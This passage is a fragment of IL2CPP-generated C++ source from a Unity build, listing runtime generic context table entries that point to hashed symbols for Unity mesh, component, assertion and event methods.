{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator_get_Current_m8BCA74F6B5B28EB47124ECF863E4F98531DE6C70 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t6DEC264D110932E9F21C7E232C370F10210B8165 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisAlignOfHelper_1_t5DFC059C73842786E56F78D02694EEC1475F75E6_m80C03AC0502A6818887311F379D7DF6967B2F741 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_tD34127A53D13AA3FDD56126691FD0D925444F4C9_m90153DC65DFC62C3B4B30D2680A8BDC8E7411173 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t36A57F9CE6EB234DE97351DCA9ED54BE9E078207 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tF9333180B7DF78112D3B62D2E60EB4F10CC9E094 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t0CC1D76DF14D95F8EACD9DB5B55E2C5EDD000035 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_InternalEnumToInt_TisT_tB29353C098F40FCC8BA976D9D704CEF2284B5EE6_mFDAFF96F8E55560D6016C301F72B23BE7739C4D6 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t86C21E83B47A2E7A1D3247A001F990A7986DB2D6 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t7D16EB7F9A3D6DA46564839B3740450A2F527939 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t7D16EB7F9A3D6DA46564839B3740450A2F527939 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_GetAllocArrayFromChannel_TisT_t37CF6268F33923438D7CC8E15A2B9E3CA15DF7C1_mB02197DF665AA05616216157D8895B7818B81121 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NoAllocHelpers_SafeLength_TisT_t0DCE4B4060595856884B9A3C03499720761720E7_mCC3053C857AB5ED9B3177B74280FC5426D742AD4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NoAllocHelpers_SafeLength_TisT_t3B82752A9C5C210D3D8FC85C28D365C3241482D3_m48331505E12A674E232789315F7A8DFCD1ED0408 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_GetListForChannel_TisT_tE4FAA5DDEC4D323662045B0868386FF42AF7CC9A_mF6E578309A2A7AB8B4F9261CA80E45C4BC3EBA57 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_List_1_tCA88055D3747C3BE6B5EECA9E34429F66AA43A6F },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_Clear_m09903AE25F21B4B38417BE0A711FFCC66E032E2C },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NoAllocHelpers_EnsureListElemCount_TisT_t175569283E6C6A13DD1949EA7FD00D9222090F79_mF72C7BAC6C7A87FDB4E0F07D1D27A902E3767ABC },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetVertices_TisT_t0B4C7345A0182B762837F7D5827740BB2818C097_m3B84FD7D3DBC2508BB87E880A502DF3630D2DE6F },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetVertices_TisT_t7536340F14B98A30E1268BDADE3EC060BD308B49_mABB5EB2D7B23299963D9E3B6A0CA94AFD2310F14 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_tFDA5AA791596471D299A369BC2F8310C2EF0AD95_mCC3897C1FCA626987680963AC3B1B19DB3B85DC8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_tFDA5AA791596471D299A369BC2F8310C2EF0AD95_mA09A2F3E237AE3DB029B892370A934CA7B4D85F8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetNormals_TisT_tC607F46DCF75201084ED8E28FA6A5C8383564534_mECA6410E7E7422079D34858DACED35B71C41B43B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetNormals_TisT_tD696723E39C98F2ADBBDF925AC8351D23C7C9478_m8BB43D611463CA0E8084406CA468FF1F065E1A65 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_t1FDC3E19064B2179CCA215183E519B2C3312464D_m823A2A5605D990D1F208C4BBEB02549527EC0A09 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t1FDC3E19064B2179CCA215183E519B2C3312464D_m527A06200587E2EEC9BCF78098BFCFE974D08AF9 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetListForChannel_TisT_t9A2EC75898A21D54F6DCC115311D500F06E96113_mEF92BF2023B83F28BB730B7C75EB7C16A718FB80 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetUVs_TisT_t4B4C02E9C5F14F2FD8E6804243A2C270E49E38A4_m9D484D7E8A5AC43CFF895334F9FF67DD84DC8DC4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetUVs_TisT_t35EB68B1F0E6DC9F74FE19A3560A67B20FF67822_m4F238422E100500C73CD9F5BF0683E38447C59B4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_t7435D448385A6AE47E0CB57AFF08EB6D2D6DAC86_mF9B891EDC8235D1C797F908F8A47A286B3697705 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t7435D448385A6AE47E0CB57AFF08EB6D2D6DAC86_m0CE0140166B47EBBE15A7C07A7D5DBEA506F2424 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_GetListForChannel_TisT_t043AAD067EDE16218EE3DC6816E26FD55FA17DA0_mEC4B1C6015865F58BF89DE007185566C2664CEA9 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Mesh_SetIndices_TisT_t583F7FC8B4B2CAE2EF0FC6BDD3DA2C2DDE8C107B_mFD1D4E0D262C7297E9A44D56CA3B43245158445A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_tBE64DC63858A443829B10211B7D0617F3B3B9526_m08DB2BDD48956713DA67146D4771F35C7268D531 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_tBE64DC63858A443829B10211B7D0617F3B3B9526_mE49EA0B97BF67D78232171B0007319ADD6230ED1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_t7DC7F18AC34B88CECD08C33869772F0CF80DAD83_m2AA4B584E4A94514A0E469694C6E7FA9891541BD },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArrayUnsafeUtility_ConvertExistingDataToNativeArray_TisT_t7DC7F18AC34B88CECD08C33869772F0CF80DAD83_m536320CB72769E7A0E6D0317B2E52B1BEDBF1FDA },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t681B41BEC9D0C2C9AFE3AE851F3F76A73C0D3894 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t84CBEB9DFC6DD42800A16EAC4ECA7A2D9D1EDE4A },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t796CA028A9FB1B7608F6D7A11E551421A7EED69D },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t796CA028A9FB1B7608F6D7A11E551421A7EED69D },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tFAEEE4BD596F2DE065BA8A08FA9ED286762E4699 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tFAEEE4BD596F2DE065BA8A08FA9ED286762E4699 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tDC702EDFC2EDB52DB571C54742E67C9CCBC8E7A4 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tDC702EDFC2EDB52DB571C54742E67C9CCBC8E7A4 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t1E55920ACC166F48B3917FD084904933E8AFE7F1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_TryGetComponent_TisT_tB1F6DD69B042B9F85E5ED839A13AB996B6B0E29F_m86E929B8246AD84B1280DFE88845E1300D48AE7D },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t15C649661EFEF4630AEAB738C610F68EA352E1B2 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t15C649661EFEF4630AEAB738C610F68EA352E1B2 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentsInChildren_TisT_t9C4229D45A3436A8EDA0B78CCC78E44565A33075_m7213955683A0BAC293DA97EC19475773D46CDA2A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentsInChildren_TisT_tEE186EBF77E976372E60AED47266A1391821BBD4_m314D3FD4EFC1C7A9CFE0784793EA17B10261EDFF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Component_GetComponentsInChildren_TisT_tD5232F456914D3CCFC14A4ECEC7232A49FD3FC44_m16F98BE92AF7AD3D2C7B18FC4106DEBA58ED65A8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Component_GetComponentsInChildren_TisT_t70879F5D1F734F88B350043E60CA45605BB03E57_m7797C0739D8065443FB967F47A8082235CC72AAF },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t2A6C94BDAF110BD8403F6F2865F59F93528931C5 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t2A6C94BDAF110BD8403F6F2865F59F93528931C5 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentsInParent_TisT_t13EC64AE8BCA0B052F8A55A4F7590FF973A3A9BF_m9FF1CFAB7F148ACAA269FF734BFB2DEFBDB11DC3 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentsInParent_TisT_t265302F3B091FB653AAB70FF196133D4DF0599D5_m5DD4866C643C34561D9C6E80E93AC4D2686147D4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Component_GetComponentsInParent_TisT_tE9CB3070184311E4DEB32802D1C766A19BBD057B_mE6EE65B4D8809935B84A4C756E27C532384C2B94 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t47581EF4E1C5D4D48A07717EFF6B45DD55F0BC77 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponents_TisT_tD486D49B2768692B2DFF7DB4A894D40A69E0021D_m89A6C2FC256BD38ABF9BA1FED0B5CC129FCC0063 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tB259E176CED00288F986516129580EFD8D4AC4E7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentInChildren_TisT_tF7E65CEFF1A6E9ECF1C91FF28C04D64CBDC6C508_m7125E43B89963DC84A0F5E247343423D9A8E0A39 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t2BE0BE87029DEAA33F169A0B03C82C3C144D13EF },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t2BE0BE87029DEAA33F169A0B03C82C3C144D13EF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentInParent_TisT_tC8A36AFF723260461A0F52D73082E9632C021261_m6923AFC7739625B6E62C33009597CFC8B5DE11DD },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t03A438CAD8F43C95AEAEBCDB0C5E4B7E377C521A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t03A438CAD8F43C95AEAEBCDB0C5E4B7E377C521A },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tE3707E950CC3E6F7B2FED3F3C488B2E13964BE1B },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t4B58FED69931A702C4CDE236963F576AB35697E9 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tAC38CEEB07F60B53F887995965E1C3FF46090B2C },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tDA9113C1B891D47285D948EFD16B87B90B3D1538 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t69B4917BCF2456954F2E7F9DF106821544E242BD },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tDCECE57B5AADF34806B5C7C69A129CD977BFD4E6 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_GameObject_GetComponentsInChildren_TisT_tAD86F214A7F1E12B6807EFCEC11E4321C8609B1D_m136992AE3C6BF3178C2771647A2674A5F780EE0D },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tADCF0C6EA7FA2FB920AB65E71CFF37A8EC63F977 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tE0F624BB3415CD6A7022ABD2FEAF02175C649724 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_tD91BEA4D5423357326FA8F9E4045AB7147FADA56 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tBEDE8BBE5DC8F74672BAD75661002C63A79E83E7 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tBEDE8BBE5DC8F74672BAD75661002C63A79E83E7 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t7221EA77A9457E95161C641D88DD8D4463B59C66 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t7221EA77A9457E95161C641D88DD8D4463B59C66 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_List_1_t8EE2439A76F7EC4A05A26B03ADAC168403CA1A47 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_get_Capacity_m4A3F99A922755A5DAFD3364B6CCB11E6F92B2427 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_get_Count_m5865B724A17582510181F1B3DAE9361A1089FE79 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_List_1_tEE3249BCF0CFD15E7212FFE381C5AFB2BCBEFFF8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_Clear_m12C9BA260689C8E1744559EF49B6EA88A2A3B124 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_get_Capacity_mA64D60606EF2EA00BFF65AE21BBBED3657D3879E },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_set_Capacity_m08212868D5FEDB3C72FEFF0F450698D7A6B71A28 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NoAllocHelpers_ResizeList_TisT_t686D0C4E0CCD640A22261BA61EED64C2DFEA7906_mE37ACFEEC2A0E6228DFB37D5F7F9605E3D07B692 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_List_1_tAE739408B9BB3197E45852CACF01E1CB3B1D8B7A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_List_1_get_Count_m4231DD6E53BBC7C914D17B64C722A04F9A424CFD },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t20FE79E0D770BF19B63ED5B0712F0C07C47C2EBA },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t20FE79E0D770BF19B63ED5B0712F0C07C47C2EBA },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t9D32A6879A920CF78321BC657934895A9A6B16B3 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tC1ACCAB10D35A2ADF17930B12A9CE02A088C8129 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Object_Instantiate_TisT_t52F660631FB7F7BD0DE31C28286F86C3AA7CC15A_m970E0FC46C03A1F5705C31E7C152F44DC634D00A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t57F69BAD5D3AB2A698E5EAD2F8DB76DB87AE4D15 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tB8DEE08EAC015A915685835C815E052C170F28E1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Resources_ConvertObjects_TisT_tB8DEE08EAC015A915685835C815E052C170F28E1_mEDA3EC2D7CA5F6FFD48973D4B9F68E691C01B605 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tB0795F25B7B8C837F964F2C628D22F5B3FFE5187 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tB0795F25B7B8C837F964F2C628D22F5B3FFE5187 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_AreEqual_TisT_tDE250F02250DA5BB278019D6514E4D8596392E44_m83E46242FCFE3AA33C8B2FCA66FFFE4919A8FDBB },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_EqualityComparer_1_get_Default_mA5809E8517D06200F76100875995377C6F96D4AA },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_EqualityComparer_1_t84DC958FF251CF642834642E8690A737CD9FA591 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_AreEqual_TisT_tE5927F2571A125C993D8F057CA124E7FC3DC8954_mA6A9ABD95AF38362C4703865C82EF3FBE9047D03 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t52DA1E1D74BC97AC493E649650AC5F805703CD7F },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t52DA1E1D74BC97AC493E649650AC5F805703CD7F },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_IEqualityComparer_1_t1FD700A0181624E6FBE4BBABD5E6EFBA8DF6D0F1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_IEqualityComparer_1_Equals_m1A8F2EE125B95E0B3F733FB8B1E75CFC5527AA8E },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_AreNotEqual_TisT_t1B796CA7C10061E01C0A80F0EF1150A07E25978B_m57A4936E64BBBCE56B38B1C17474C69ADBA119E1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_EqualityComparer_1_get_Default_m3BE171F79782D83EDD03B05B63AAC87FB7195C0A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_EqualityComparer_1_t98561A291AD1CA165F244E1BBCCAB3DE0F2B128B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_AreNotEqual_TisT_t6EAA416070F6D392C8011B0D278FACBA1D69AFA7_mAAD48C8795D6E83610A86B37AE943DC951A45A2D },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tDF9BC11318A958DF7099DD7B0663AB49989474A5 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tDF9BC11318A958DF7099DD7B0663AB49989474A5 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_IEqualityComparer_1_t2C6ABCD8F844051E4598D130E0095EB85127F3C3 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_IEqualityComparer_1_Equals_m4AC908BF9E4B3123EBC08F13294F00A1FE7FB770 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_IsNull_TisT_t0103B9CD45363DA40C752BA4F45E0684E93978A4_mC1288A479CB77993967403C63E2B93992580AB7D },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tF5EF6247586A03EE4340C158010A5B224A9B6833 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tF5EF6247586A03EE4340C158010A5B224A9B6833 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Assert_IsNotNull_TisT_tD253C6F7A876FF11A9ACF475435EE3BAB4BED906_m47A66E6E0E45926791B2ED4D9E1C80A4F3EEC56E },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t9EBB964C588A6F4EC7C9D5AEFB6A3261E23FC3BD },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t9EBB964C588A6F4EC7C9D5AEFB6A3261E23FC3BD },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_t551CD9132A56187EAD25AF82497BCB4DCF1E8350 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_t551CD9132A56187EAD25AF82497BCB4DCF1E8350 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_UnityAction_1_tCCA8583F35FD5AE88387AAD4E2261C24D9979824 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_UnityAction_1_tCCA8583F35FD5AE88387AAD4E2261C24D9979824 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1_add_Delegate_mECA9E6CE4BAD907A97BE5964BC2CF01178F9427A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_t4A7981CB01490A2A7DA9FBF2B6226DF5A138F42E_m04E26D717AEDDA5FECFF175AD172D7666F245104 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_t4A7981CB01490A2A7DA9FBF2B6226DF5A138F42E },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnityAction_1_Invoke_m6598320BD28F7690DC297C2D1F87436595246AD2 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_UnityAction_2_tA5FBFB62634255D0C1C76ED53ED268910F21D441 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_UnityAction_2_tA5FBFB62634255D0C1C76ED53ED268910F21D441 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_t9D4999D88C7B830ABB2D05D533BCBEEDD1143578_mC78D5F83CF9069093241E3173261ED62EA857497 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_tF7E890566125E6432EE9E728DF2678F1FBD7624F_mAE2C52051303B194784BC699E786492269CE0892 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_t9D4999D88C7B830ABB2D05D533BCBEEDD1143578 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T2_tF7E890566125E6432EE9E728DF2678F1FBD7624F },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnityAction_2_Invoke_m7B3D91E337EE5BAED8EA3215A76E80E739B4B426 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_UnityAction_3_tB802B24846E106C51390123789ECCE1427B772DB },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_UnityAction_3_tB802B24846E106C51390123789ECCE1427B772DB },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_tDD0CBCE6751A7AA6283525B34926445E9E8AE9CD_m962A6767B9633856AE423D2CDF4F588AB16685D0 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_t96DEF47C17C0A95AF6486BBDB3BF783D23B0EEA4_mEC7A63981F2DFBA40DFFAD296F7EFA8E570000A1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT3_tF187F110CB8F78B82DCD38B6B40A536930C3073A_mFC6BF62D55BB6C429FDB7D76D4397CF1C11B07FF },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_tDD0CBCE6751A7AA6283525B34926445E9E8AE9CD },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T2_t96DEF47C17C0A95AF6486BBDB3BF783D23B0EEA4 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T3_tF187F110CB8F78B82DCD38B6B40A536930C3073A },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnityAction_3_Invoke_mA324678227155AC00FF70BE3C44323B457BFD798 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_UnityAction_4_tFE7F69F55A61B1C94EA4396BA51831F006EF45C1 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_UnityAction_4_tFE7F69F55A61B1C94EA4396BA51831F006EF45C1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_tCE3D89B38CA521697C593DAE4D82CAFBB2C9ED94_mE83BAB69E0592AEE60CE0152499F0C22C2E6322E },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_t34D887E41D241A60221CA639979D3D4F38703E87_m3F52A56242C7E028162E45188D795E629B2D8F5C },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT3_tFBD42D7B101B8A5CD76C71411573A51F3E2853CA_m0B7861A81FC3376DE20D3BEC1B30311A03B6BBC9 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT4_t0BBC6D9FC60BD795EF0615DE3AF72F4023D692E4_m25ED019E3FF0305418A1E8660262063F68761B0D },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_tCE3D89B38CA521697C593DAE4D82CAFBB2C9ED94 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T2_t34D887E41D241A60221CA639979D3D4F38703E87 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T3_tFBD42D7B101B8A5CD76C71411573A51F3E2853CA },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T4_t0BBC6D9FC60BD795EF0615DE3AF72F4023D692E4 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnityAction_4_Invoke_m8DF32CE2946727C5507D46D1FD8AD351D15816AB },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1__ctor_m1389E18EDB338B358E4F3F611C988D4F289C3610 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_InvokableCall_1_t9D6E3FE6D6A16671D4E69788C9ACC7F2B36C7991 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1_Invoke_mFF9FABA4D19E5E62BC94188FD9669DF0822877AF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnityEvent_1_GetDelegate_m4C1A6FA5CC5A98FA9363140CBDCE7F4C8EA790B9 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_UnityEvent_1_t89A7C04EA256B0BC85B7146022DCB5DEE2372F96 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T0_t1DDE0E960341E6946BD0558FBC0AF39C25D1BADD },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_InvokableCall_1_tE6E100E6334FD6163AE44C87E199C349C093BD75 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1__ctor_m5A5E72EA57CAF0FB814DC260129AF6299C863168 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1__ctor_m059C54248830773976A8AA9E2376F2084554A793 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_1_Invoke_m6FE04AA3ACA2CCDADFDBD7370510749312B0A9C1 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T0_t1DDE0E960341E6946BD0558FBC0AF39C25D1BADD },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T0_tAA07CC24358202AA2E3E7613A154A398E0B7B225 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T1_t71A7ECBDA9A30E9DF39AB8875233AB21E2D64D81 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_InvokableCall_2_t4BFE337E7B7692E2C6577ACD66F585B79CE14A24 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_2__ctor_m0919348880B03810235E94AB7B17DEEBD362EA14 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_InvokableCall_2_Invoke_m98F0496104C7CC3C6ACDAAB7A7325C8091995B8C },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T0_tAA07CC24358202AA2E3E7613A154A398E0B7B225 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T1_t71A7ECBDA9A30E9DF39AB8875233AB21E2D64D81 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T0_t2BF919984BA3AAA12AAAF3E9960454C42BB39A22 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T1_t71CAC2632D33DBDDEE8DA6226138D3EDF698F5D9 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T2_tCDED8A2B57D1F30D46697051883B8E26107AC0E1 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_InvokableCall_3_t010264F21755EF589AF36AB230DF4498652AB3BE },
